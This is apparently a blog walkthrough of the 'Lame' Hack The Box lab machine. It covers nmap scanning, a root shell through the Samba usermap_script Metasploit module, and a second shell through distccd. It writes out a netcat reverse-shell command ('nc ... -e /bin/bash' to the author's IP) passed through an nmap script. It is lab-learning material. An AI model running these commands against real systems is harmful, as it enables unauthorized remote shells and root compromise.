LAME

Burak Dirlik
3 min read · Jun 25, 2024


Lame is an easy-rated Linux machine. The target IP is 10.129.213.71; let's start.

First, let's look at the open ports, as always.

nmap -sC -sV -O -oA nmap.txt 10.129.213.71

• Port 21: FTP, with anonymous login allowed.

• Port 22: SSH.

• Ports 139 and 445: Samba 3.0.20-Debian.

Let's do a full-port scan to make sure no ports are missed. Note that -oA takes a basename and writes .nmap, .gnmap and .xml files, so give the second scan a different name or it overwrites the first.

nmap -sC -sV -O -p- -oA nmap-full 10.129.213.71

We have one more port, 3632, running the distccd service. I note it down; we will use it later. Now let's try the FTP anonymous login, but nothing significant comes up.

We look for a backdoor related to the FTP version, and there is a matching Metasploit module.

I set RHOSTS and ran it, but no session was created; the service just asked for a password.

Let's see if anything comes up for port 22. There is a command-execution module, but I will try that later.

For now let's move on to port 139, which runs Samba 3.0.20-Debian. Metasploit has a command-execution exploit for it named 'Username map script' (exploit/multi/samba/usermap_script, CVE-2007-2447): when smb.conf uses the non-default "username map script" option, the username sent during SMB session setup is passed to that script through a shell before any authentication, so shell metacharacters in the username execute commands. Let's try it.

We set RHOSTS to the target 10.129.213.71 and LHOST to tun0, then run it. This gives us a shell, and since smbd invokes the map script as root, the shell is root.

We find the user and root flags by browsing the directories.

I want to try to get a shell another way. Looking back at the full-port nmap result, port 3632 is open.

Googling the service shows there is an nmap script for distccd, distcc-cve2004-2687. CVE-2004-2687 is the well-known distcc 2.x weakness: when the server is not configured to restrict which clients may connect, it accepts compile jobs from anyone and runs the "compiler" the client names without any authorization check, which amounts to arbitrary command execution. Let's try it.

I tried it with Metasploit/meterpreter first, but no session was created.

Let's try with nmap. It failed 5 or 6 times; later I realized I had typed my own IP wrong, and fixed it after confirming it with ifconfig. Start a netcat listener in one terminal, then pass a reverse shell as the script's command argument in another, and the shell drops:

nc -nlvp 4466
nmap -p 3632 10.129.213.71 --script distcc-cve2004-2687 --script-args="distcc-cve2004-2687.cmd='nc -nv 10.10.14.168 4466 -e /bin/bash'"

We got another shell with a different method, but this time it is low privileged (the command runs as the distccd service account). We already have the root flag, so that is enough.
